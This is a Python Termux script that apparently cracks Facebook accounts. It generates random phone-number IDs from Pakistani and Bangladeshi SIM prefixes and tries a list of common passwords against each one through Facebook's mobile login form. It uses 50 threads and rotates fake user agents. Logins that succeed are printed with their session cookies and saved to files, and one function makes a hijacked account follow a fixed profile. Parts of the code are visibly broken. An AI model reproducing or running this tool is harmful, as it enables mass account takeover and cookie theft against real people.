#--------------------INFO-------------------#
#CODING BY SAFWAN 
#SCRIPT RANDOM CLONE 
#FACEBOOK > JOMIDAR
#GITHUB > SAFWAN-XD
#-------------MAIN>MENU-------------#
import os
import sys
import time
import requests
import uuid
os.system('clear')
def o():
    os.system('clear')
    print(logo)
    ip = requests.get("https://api.ipify.org").text
    jalan("     \033[97;1m[\033[92;1m+\033[97;1m] \033[97;1m𝗜𝗣 𝗔𝗗𝗗𝗥𝗘𝗦𝗦 \033[38;5;196m: \033[1;32m"+ip)
    print("     \033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;32m-\033[1;35m-\033[1;34m-\033[1;97m-\033[1;33m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[38;5;196m-\033[1;32m-\033[1;97m-\033[1;35m-\033[1;34m-\033[1;33m-\033[38;5;46m-\033[1;97m-\033[1;32m-\033[1;33m-\033[38;5;196m-")
    jalan("     \033[97;1m[\033[92;1m1\033[97;1m] \033[97;1m𝗦𝗧𝗔𝗥𝗧 𝗥𝗔𝗡𝗗𝗢𝗠 𝗖𝗟𝗢𝗡𝗜𝗡𝗚   ")
    print("     \033[97;1m[\033[92;1m2\033[97;1m] \033[95;1m𝗖𝗢𝗡𝗧𝗔𝗖𝗞 𝗔𝗗𝗠𝗜𝗡")
    print("     \033[97;1m[\033[92;1m3\033[97;1m] \033[92;1m𝗝𝗢𝗜𝗡 𝗠𝗬 𝗙𝗕 𝗣𝗔𝗚𝗘 ")
    Masum = input('     \033[97;1m[\033[92;1m?\033[97;1m] \033[97;1m𝗦𝗘𝗟𝗘𝗧 𝗠𝗘𝗡𝗨 \033[38;5;196m: ')
    if Masum == '1':
        i()
    if Masum == '2':
        os.system('xdg-open https://www.facebook.com/profile.php?id=100000446995720')
    if Masum == '3':
        os.system('xdg-open https://facebook.com/groups/2791954394284501/')
    if Masum == 'E':
        os.system('exit')
        return None
import os,sys,time,json,random,re,string,platform,base64,uuid
os.system("git pull")
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from time import sleep as waktu
try:
    import requests
    from concurrent.futures import ThreadPoolExecutor as ThreadPool
    import mechanize
    from requests.exceptions import ConnectionError
except ModuleNotFoundError:
    os.system('pip install mechanize requests futures bs4==2 > /dev/null')
    os.system('pip install bs4')
    

def follow(self, session, coki):
        r = BeautifulSoup(session.get('https://free.facebook.com/profile.php?id=100015315258519', {
            'cookie': coki }, **('cookies',)).text, 'html.parser')
        get = r.find('a', 'Ikuti', **('string',)).get('href')
        session.get('https://free.facebook.com' + str(get), {
            'cookie': coki }, **('cookies',)).text
            
            
 
class jalan:
    def __init__(self, z):
        for e in z + "\n":
            sys.stdout.write(e)
            sys.stdout.flush()
            time.sleep(0.040)

            
RED = '\033[38;5;196m'
WHITE = '\033[1;97m'
GREEN = '\033[1;32m' #
YELLOW = '\033[1;33m'
BLUE = '\033[1;34m'
ORANGE = '\033[1;35m'
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'    # WARNA MATI
A = '\x1b[1;90m' # WARNA ABU ABU
BN = '\x1b[1;107m' # BELAKANG PUTIH
BBL = '\x1b[1;106m' # BELAKANG BIRU LANGIT
BP = '\x1b[1;105m' # BELAKANG PINK
BB = '\x1b[1;104m' # BELAKANG BIRU
BK = '\x1b[1;103m' # BELAKANG KUNING
BH = '\x1b[1;102m' # BELAKANG HIJAU
BM = '\x1b[1;101m' # BELAJANG MERAH
BA = '\x1b[1;100m' # BELAKANG ABU ABU
my_color = [
 P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
bi = random.choice([M,N,K,B,U])
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
logo=("""
 ╔━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╗
 ║\033[0;96m●▬▬▬▬▬๑🌸🕌۩[𝗕𝗜𝗦𝗠𝗜𝗟𝗟𝗔𝗛𝗜𝗥 𝗥𝗔𝗛𝗠𝗔𝗡𝗜𝗥 𝗥𝗔𝗛𝗜𝗠]۩🕌🌸๑▬▬▬▬▬▬●\033[0;91m║
 ╚━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╝
  /$$$$$$   /$$$$$$  /$$$$$$$$ /$$      /$$  /$$$$$$  /$$   /$$
 /$$__  $$ /$$__  $$| $$_____/| $$  /$ | $$ /$$__  $$| $$$ | $$
| $$  \__/| $$  \ $$| $$      | $$ /$$$| $$| $$  \ $$| $$$$| $$
|  $$$$$$ | $$$$$$$$| $$$$$   | $$/$$ $$ $$| $$$$$$$$| $$ $$ $$
 \____  $$| $$__  $$| $$__/   | $$$$_  $$$$| $$__  $$| $$  $$$$
 /$$  \ $$| $$  | $$| $$      | $$$/ \  $$$| $$  | $$| $$\  $$$
|  $$$$$$/| $$  | $$| $$      | $$/   \  $$| $$  | $$| $$ \  $$
 \______/ |__/  |__/|__/      |__/     \__/|__/  |__/|__/  \__/                                                                                                                                                                                            
 ╔━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╗
 ║\33[0;95m[<🕌𝗔𝗦𝗦𝗔𝗟𝗔𝗠𝗨𝗔𝗟𝗔𝗜𝗞𝗨𝗠"𝗢𝗥𝗢𝗛𝗠𝗔𝗧𝗨𝗟𝗟𝗔𝗛𝗜"𝗢𝗕𝗔𝗥𝗢 𝗞𝗔𝗧𝗨𝗛𝗨🕴️>]\033[0;95m║
 ╚━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╝
\033[1;31m==================================================
\033[1;32m[•]═════════════════════════════════[•]
        \033[1;97m[\033[1;92m❯\033[1;97m]𝗔𝗗𝗠𝗜𝗡     \033[1;91m: \033[1;97mSAFWAN ISLAM \033[1;92m            
        \033[1;97m[\033[1;92m❯\033[1;97m]𝗙𝗔𝗖𝗘𝗕𝗢𝗢𝗞  \033[1;91m: \033[1;97mJOMIDAR\033[1;92m      
        \033[1;97m[\033[1;92m❯\033[1;97m]𝗙𝗕 𝗣𝗔𝗚𝗘  \033[1;91m: \033[1;97msafwan termux command 
        \033[1;97m[\033[1;92m❯\033[1;97m]\033[97;1m𝗧𝗢𝗢𝗟𝗦     \033[38;5;196m: \033[1;97m𝗥𝗔𝗡𝗗𝗢𝗠 𝗖𝗟𝗢𝗡𝗘        \033[38;5;46m
        \033[1;97m[\033[1;92m❯\033[1;97m]\033[97;1m𝗡𝗘𝗧𝗪𝗔𝗥𝗞   \033[38;5;196m: \033[1;97m3G\033[97;1m,𝗗𝗔𝗧𝗗+𝗪𝗜𝗙𝗜   \033[38;5;46m  
        \033[1;97m[\033[1;92m❯\033[1;97m]\033[97;1m𝗩𝗔𝗥𝗦𝗢𝗡   \033[38;5;196m: \033[1;97m2.𝗢    \033[38;5;46m          
=================================================="\033[1;23m""")
try:
    print("\033[38;5;46m\n𝗧𝗢𝗢𝗟𝗦 𝗨𝗣𝗗𝗔𝗧𝗘 𝗦𝗨𝗖𝗖𝗘𝗦𝗦𝗙𝗨𝗟𝗟\n")
    time.sleep(2)
    Masum()
    print("\033[38;5;196m\n𝗬𝗢𝗨𝗥 𝗗𝗜𝗩𝗘𝗜𝗖 𝗜𝗡 𝗡𝗢𝗧 𝗦𝗨𝗣𝗣𝗢𝗥𝗧𝗘𝗗!\n")
    Masum()
    v = 5.2
    update = ('5.2')
    update = ('5.2')
    if str(v) in update:
        os.system('clear')
    else:pass
except:print('\n\033[1;31m𝗣𝗥𝗢𝗕𝗟𝗘𝗠 𝗜𝗡𝗧𝗘𝗥𝗡𝗘𝗧 𝗖𝗨𝗡𝗘𝗖𝗖𝗧𝗜𝗢𝗡, 𝗖𝗛𝗖𝗞 𝗔𝗡𝗗 𝗧𝗥𝗬 𝗔𝗚𝗔𝗡\033[0;92m')


loop = 0
oks = []
cps = []
 
def clear():
    os.system('clear')
    print(logo)
from time import localtime as lt
from os import system as cmd
ltx = int(lt()[3])
if ltx > 12:
    a = ltx-12
    tag = "PM"
else:
    a = ltx
    tag = "AM"
    
    
try:
    print('\n\n\033[1;33mLoading asset files ... \033[0;97m')
    v = 5.2
    update = ('5.2')
    update = ('5.2')
    if str(v) in update:
        os.system('clear')
    else:pass
except:print('\n\033[1;31mNo internet connection ... \033[0;97m')
#global functions
def dynamic(text):
    titik = ['.   ','..  ','... ','.... ']
    for o in titik:
        print('\r'+text+o),
        sys.stdout.flush();time.sleep(1)

#User agents
ugen2=[]
ugen=[]

for xd in range(98605):
    aa='Mozilla/5.0 (Linux; U; Android'
    b=random.choice(['3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20'])
    c=' en-us; GT-'
    d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    e=random.randrange(1, 999)
    f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
    h=random.randrange(73,100)
    i='0'
    j=random.randrange(4200,4900)
    k=random.randrange(40,150)
    l='Mobile Safari/537.36'
    uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
    ugen.append(uaku2)
    
def i():
    user=[]
    twf =[]
    os.getuid
    os.geteuid
    os.system("clear")
    print(logo)
    print("            \033[1;92m8 𝗗𝗜𝗚𝗘𝗧 \033[1;95m𝗖𝗟𝗢𝗡𝗜𝗡𝗚 \033[97;1m[\033[92;1m𝗘𝗡𝗝𝗢𝗬\033[97;1m]")
    print("    \033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;32m-\033[1;35m-\033[1;34m-\033[1;97m-\033[1;33m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[38;5;196m-\033[1;32m-\033[1;97m-\033[1;35m-\033[1;34m-\033[1;33m-\033[38;5;46m-\033[1;97m-\033[1;32m-\033[1;33m-\033[38;5;196m-")
    print('    \033[97;1m[\033[92;1m•\033[97;1m]\033[1;97m𝗣𝗞 𝗖𝗢𝗗𝗘    \033[38;5;196m:\033[1;97m 92301 92302 92303 92305')
    print('    \033[97;1m[\033[92;1m•\033[97;1m]\033[1;97m𝗕𝗗 𝗖𝗢𝗗𝗘    \033[38;5;196m:\033[1;97m 88016 88017 88018 88019')
    print("    \033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;32m-\033[1;35m-\033[1;34m-\033[1;97m-\033[1;33m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[38;5;196m-\033[1;32m-\033[1;97m-\033[1;35m-\033[1;34m-\033[1;33m-\033[38;5;46m-\033[1;97m-\033[1;32m-\033[1;33m-\033[38;5;196m-")
    code = input('    \033[38;5;196mINPUT CODE \033[1;97m: ')
    print("")
    os.system('clear')
    print(logo)
    print("             \033[1;97m[\033[1;33m𝗟 𝗜 𝗠 𝗜 𝗧 𝗠 𝗘 𝗡 𝗨\033[1;97m]")
    print("    \033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;32m-\033[1;35m-\033[1;34m-\033[1;97m-\033[1;33m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[38;5;196m-\033[1;32m-\033[1;97m-\033[1;35m-\033[1;34m-\033[1;33m-\033[38;5;46m-\033[1;97m-\033[1;32m-\033[1;33m-\033[38;5;196m-")
    print("    \033[97;1m[\033[92;1m+\033[97;1m] \033[1;97m𝗘𝗫𝗔𝗠𝗣𝗢𝗟      \033[38;5;196m: \033[1;35m10000\033[1;97m , \033[1;34m20000\033[1;97m , \033[1;32m30000")
    limit = int(input("    \033[97;1m[\033[92;1m?\033[97;1m] \033[1;97m𝗖𝗥𝗔𝗖𝗞 𝗜𝗗 𝗟𝗜𝗠𝗜𝗧 \033[38;5;196m: \033[1;32m"))
    
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(8))
        user.append(nmp)
    with ThreadPool(max_workers=50) as setu:
        clear()
        tl = str(len(user))
        jalan('     \033[97;1m[\033[92;1m+\033[97;1m] \033[92;1m𝗔𝗚𝗘𝗡𝗧𝗦    \033[38;5;196m: \033[1;32m'+str(len(ugen)))
        jalan('     \033[97;1m[\033[92;1m+\033[97;1m] \033[92;1m𝗦𝗜𝗠 𝗖𝗢𝗗𝗘  \033[38;5;196m: \033[1;32m'+code)
        jalan('     \033[97;1m[\033[92;1m+\033[97;1m] \033[92;1m𝗖𝗥𝗔𝗖𝗞 𝗜𝗗  \033[38;5;196m: \033[1;32m'+tl)
        print('     \033[97;1m[\033[92;1m+\033[97;1m] \033[93;1m𝗙𝗜𝗟𝗘 𝗦𝗔𝗩𝗘 \033[38;5;196m: \033[38;5;46mMasum-XD-OK.txt')
        print('     \033[97;1m[\033[92;1m+\033[97;1m] \033[93;1m𝗙𝗜𝗟𝗘 𝗦𝗔𝗩𝗘 \033[38;5;196m: \033[38;5;196mMasum-XD-CP.txt')
        print("     \033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;32m-\033[1;35m-\033[1;34m-\033[1;97m-\033[1;33m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[38;5;196m-\033[1;32m-\033[1;97m-\033[1;35m-\033[1;34m-\033[1;33m-\033[38;5;46m-\033[1;97m-\033[1;32m-\033[1;33m-\033[38;5;196m-")
        jalan("     \033[97;1m[\033[92;1m✓\033[97;1m] \033[1;97m𝗙𝗜𝗥𝗦𝗧 \033[1;34m[\033[1;32m𝗢𝗡\033[1;97m/\033[38;5;196m𝗢𝗙𝗙\033[1;34m] \033[1;97m𝗔𝗥𝗜𝗢𝗣𝗟𝗘𝗡 𝗠𝗢𝗗𝗘🚀")
        jalan("     \033[97;1m[\033[92;1m✓\033[97;1m] \033[1;97m𝗠𝗜𝗫 𝗜𝗗𝗭 𝗖𝗟𝗢𝗡𝗜𝗡𝗚 𝗘𝗡𝗝𝗢𝗬 𝗗𝗘𝗔𝗥 𝗨𝗦𝗘𝗥 ✔")
        print("     \033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;32m-\033[1;35m-\033[1;34m-\033[1;97m-\033[1;33m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[38;5;196m-\033[1;32m-\033[1;97m-\033[1;35m-\033[1;34m-\033[1;33m-\033[38;5;46m-\033[1;97m-\033[1;32m-\033[1;33m-\033[38;5;196m-")
        for love in user:
            pwx = [love,'###@@@','khan123','khan1234','khan###','khan@@@','khan@@@','@@@###','123@@@','123###','6848373','01847448','bangladesh','i love you','Bangladesh','free fire','Free fire','I love you','Sakil@123','Sakil123','Sakil@@@','@#৳%&%৳#@','&%৳৳%&','#@৳%৳#@','@#৳&&&%#','@৳&&৳#@','643%&4#','13@৳4#','14#@54','@24#@3#','@৳৳2%#৳','(1463#%)','sakil@@@','zara gaming@@@','sadia@@@','mahedi@123',]
            uid = code+love
            setu.submit(rcrack,uid,pwx,tl)
    print('\n    𝗖𝗥𝗔𝗖𝗞 𝗣𝗥𝗢𝗖𝗘𝗦𝗦 𝗛𝗔𝗦 𝗕𝗘𝗘𝗡 𝗖𝗢𝗠𝗣𝗟𝗘𝗗 ')
 
def rcrack(uid,pwx,tl):
    #print(user)
    global loop
    global cps
    global oks
    global proxy
    try:
        for ps in pwx:
            pro = random.choice(ugen)
            session = requests.Session()
            free_fb = session.get('https://p.facebook.com').text
            log_data = {
                "lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
            "jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
            "m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
            "li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
            "try_number":"0",
            "unrecognized_tries":"0",
            "email":uid,
            "pass":ps,
            "login":"Log In"}
            header_freefb = {'authority': 'p.facebook.com',
            "method": 'GET',
            "scheme": 'https',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'max-age=0',
            'dpr': '1.7000000476837158',
            'sec-ch-prefers-color-scheme': 'dark',
            'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"',
            'sec-ch-ua-full-version-list': '"Not)A;Brand";v="24.0.0.0", "Chromium";v="116.0.5845.240"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-model': '""',
            'sec-ch-ua-platform': '"Linux"',
            'sec-ch-ua-platform-version': '""',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-user': '?1',
            'upgrade-insecure-requests': '1',
            'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
            'viewport-width': '980',
}
            lo = session.post('https://p.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
            log_cookies=session.cookies.get_dict().keys()
            if 'c_user' in log_cookies:
                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
                cid = coki[65:80]
                print('\033[38;5;46m[SAFWAN-OK] ' +uid+ '|' +ps+    '  \n   \033[1;33mCOOKIES : \033[38;5;46m'+coki+ ' ')                
                open('/sdcard/SAFWAN-XD-OK.txt', 'a').write( uid+' | '+ps+'\n')
                oks.append(cid)
                break
            elif 'checkpoint' in log_cookies:
                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
                cid = coki[65:80]
                print('\033[38;5;46m[SAFWAN-CP] ' +uid+ '|' +ps+ '  \33[0;97m')
                open('/sdcard/SAFWAN-CP.txt', 'a').write( uid+' | '+ps+' \n')
                cps.append(cid)
                break
            else:
                continue
        loop+=1
        sys.stdout.write('\r    \33[1;93m[\033[1;95mSAFWAN\033[0m/%s\33[1;93m]\033[1;97mSAFWAN OK-\033[38;5;46m%s'%(loop,len(oks))),
        sys.stdout.flush()
    except:
        pass
        
